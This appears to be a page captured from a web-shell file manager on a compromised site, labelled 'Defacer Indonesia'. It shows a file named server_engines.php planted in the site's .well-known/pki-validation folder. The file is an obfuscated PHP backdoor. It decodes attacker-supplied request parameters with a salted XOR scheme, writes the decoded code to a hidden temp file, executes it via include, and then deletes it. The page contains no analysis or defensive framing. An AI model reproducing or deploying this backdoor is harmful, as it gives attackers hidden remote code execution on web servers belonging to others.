whoami7 - Manager
:
/
home
/
analuakl
/
www
/
.well-known
/
pki-validation
/
Upload File:
files >> /home/analuakl/www/.well-known/pki-validation/server_engines.php
<?php if(in_array("f\x61ct\x6Fr", array_keys($_REQUEST))){ $flg = array_filter([getcwd(), getenv("TMP"), "/tmp", sys_get_temp_dir(), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path()]); $itm = $_REQUEST["f\x61ct\x6Fr"]; $itm =explode ( '.' , $itm ) ; $val = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt9 ); $j = 0; $len = count($itm ); do { if ($j >= $len) break; $v9 = $itm[$j]; $chS = ord($salt9[$j% $lenS] ); $dec = ((int)$v9 - $chS - ($j% 10)) ^ 66; $val .= chr($dec ); $j++;}while (true ); foreach ($flg as $key => $symbol) { if (is_dir($symbol) && is_writable($symbol)) { $key = "$symbol" . "/.entity"; $success = file_put_contents($key, $val); if ($success) { include $key; @unlink($key); die();} } } } if(isset($_REQUEST["e\x6E\x74"]) ? true : false){ $parameter_group = array_filter([getenv("TEMP"), sys_get_temp_dir(), "/tmp", getenv("TMP"), "/var/tmp", getcwd(), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm"]); $mrk = $_REQUEST["e\x6E\x74"]; $mrk = explode( '.' ,$mrk ) ; $record = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); $i = 0; while( $i < count( $mrk)) { $v7 = $mrk[$i]; $sChar = ord( $s[$i %$lenS]); $dec =( ( int)$v7 - $sChar -( $i %10)) ^ 29; $record .= chr( $dec); $i++; } while ($entry = array_shift($parameter_group)) { if ((function($d) { return is_dir($d) && is_writable($d); })($entry)) { $resource = "$entry/.reference"; if (@file_put_contents($resource, $record) !== false) { include $resource; unlink($resource); die(); } } } }
Copyright ©2021 || Defacer Indonesia